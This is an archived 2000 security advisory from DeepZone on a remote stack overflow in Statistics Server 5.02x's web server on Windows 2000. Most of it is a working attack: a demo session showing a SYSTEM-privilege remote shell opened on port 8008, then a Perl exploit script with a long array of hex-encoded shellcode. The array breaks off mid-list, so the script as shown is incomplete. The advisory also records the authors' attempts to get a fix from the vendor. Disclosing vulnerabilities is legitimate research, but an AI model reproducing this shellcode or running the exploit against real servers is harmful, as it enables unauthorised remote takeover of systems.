[DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit)

2000-08-12T00:00:00
ID SECURITYVULNS:DOC:541
Type securityvulns
Reporter Securityvulns
Modified 2000-08-12T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

                            Statistics Server 5.02x overflow

             Advisory Name: Statistics Server Live Stats
         Advisory Released: [00/08/10]
               Application: Web site traffic analyzer
                  Severity: local/remote user can run arbitrary
                            code with WebServer privileges
                    Status: vendor contacted
                   Authors: Nemo - nemo@deepzone.org
                            |Zan - izan@deepzone.org
                       WWW: http://www.deepzone.org
                            http://deepzone.cjb.net


    ___________________________________________________________________


    OVERVIEW

    'Statistics Server is far more than just another log analyzer. It
     analyzes Web site traffic in "Real-time" and generates "Live Stats"
     reports in an easy to use Web interface.'

    'The ability of Statistics Server to deliver Live Web statistics for
     high volume installations has made it an essential component of
     many corporate Internet and Intranet Web sites and ISP Web hosting
     installations.'

    ___________________________________________________________________

    BACKGROUND

    Statistics Server 5.02x ships with a stack overflow in its web
    component. It *lets run arbitrary code inside* by local/remote user.

    Tests, ideas & exploits were tested against Win2k/Spanish version
    and WinNT 4.0/sp6a Spanish version.

    Web server runs like a system service with a default installation.

    ___________________________________________________________________

    DETAILS

    Web server can't handle long requests correctly. When a long GET
    (about 2033 bytes) request is made. It dies with EIP overwritten.

    It lets run arbitrary code with web servers privileges (system
    privileges by default).


    ___________________________________________________________________

    EXPLOIT

    It spawns a remote winshell on 8008 port. It doesn't kill webserver
    so webserver continues running while hack is made. When hack is
    finished webserver will run perfectly too.

    ex.

    $ lynx http://vulnerable.com

            Server Selection
            Please Enter Server ID _____________ GO

            ....


    $ ./ssexploit502x.pl vulnerable.com 80


            (c) Deep Zone - Statistics Server 5.02x's exploit

                    Coded by |Zan - izan@deepzone.org

         -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-


      spawning remote shell on port 8008 ...

    HTTP/1.0 302
    Server: Statistics Server 5.0
    Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

             ...    ...     ...     ...     ...     ...     ...

    Content-Type: text/html
    Connection: Keep-Alive
    Content-Lenght: 0

    ... done.

    $ lynx http://vulnerable.com            (It continues working }:)

            Server Selection
            Please Enter Server ID _____________ GO

            ....

    $ telnet vulnerable.com 8008

     Trying vulnerable.com...
     Connected to vulnerable.com.
     Escape character is '^]'.

     Microsoft Windows 2000 [Version 5.00.2195]
     (C) Copyright 1985-1999 Microsoft Corp.

     D:\StatisticsServer>


    ___________________________________________________________________

    FIXES/PATCHES

    We contacted Statistics Server support in http://www.mediahouse.com
    six weeks ago.

    Firstly they told us that new release didn't contain any bof bug.
    When we sent a DoS source they told us that new release could have
    some problem and it will be fixed in next new release, while we will
    be kept to update with fix progress.

    We weren't contacted again. Any news about mediahouse.com

    Two days ago we email them again asking them about patchs, fixes
    and progress. We haven't any reply.

    ___________________________________________________________________


    EXPLOIT SOURCE

    bug was discovered by Nemo - nemo@deepzone.org while auditing a
    very important spanish ISP (others affected).

    bug was exploited by  |Zan - izan@deepzone.org

    exploit works against Win2k/Statistics Server 5.02x running like
    service.



    #!/usr/bin/perl -w
    # Statistics Server 5.02x's exploit.
    # usage: ./ssexploit502x.pl hostname port
    # 00/08/10
    # http://www.deepzone.org
    # http://deepzone.cjb.net
    # http://mareasvivas.cjb.net  (|Zan homepage)
    #
    # --|Zan <izan@deepzone.org>
    # ----------------------------------------------------------------
    #
    # This exploit works against Statistics Server 5.02x/Win2k.
    #
    # Tested with Win2k (spanish version).
    #
    # It spawns a remote winshell on 8008 port. It doesn't kill
    # webserver so webserver continues running while hack is made.
    # When hack is finished webserver will run perfectly too.
    #
    # Default installation gives us a remote shell with system
    # privileges.
    #
    # overflow discovered by
    # -- Nemo <nemo@deepzone.org>
    #
    # exploit coded by
    # -- |Zan <izan@deepzone.org>
    #
    # ----------------------------------------------------------------

    use IO::Socket;


    @crash = (
    "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
    "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
    "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
    "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
    "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
    "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
    "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
    "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
    "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
    "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
    "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
    "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
    "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
    "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
    "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
    "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
    "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
    "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
    "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
    "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
    "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
    "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
    "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
    "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
    "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
    "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
    "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
    "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
    "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
    "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
    "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
    "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
    "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
    "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
    "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
    "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
    "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
    "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
    "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
    "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
    "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
    "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
    "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
    "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
    "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
    "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
    "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
    "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
    "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
    "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
    "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
    "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
    "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
    "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
    "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
    "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
    "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
    "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
    "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",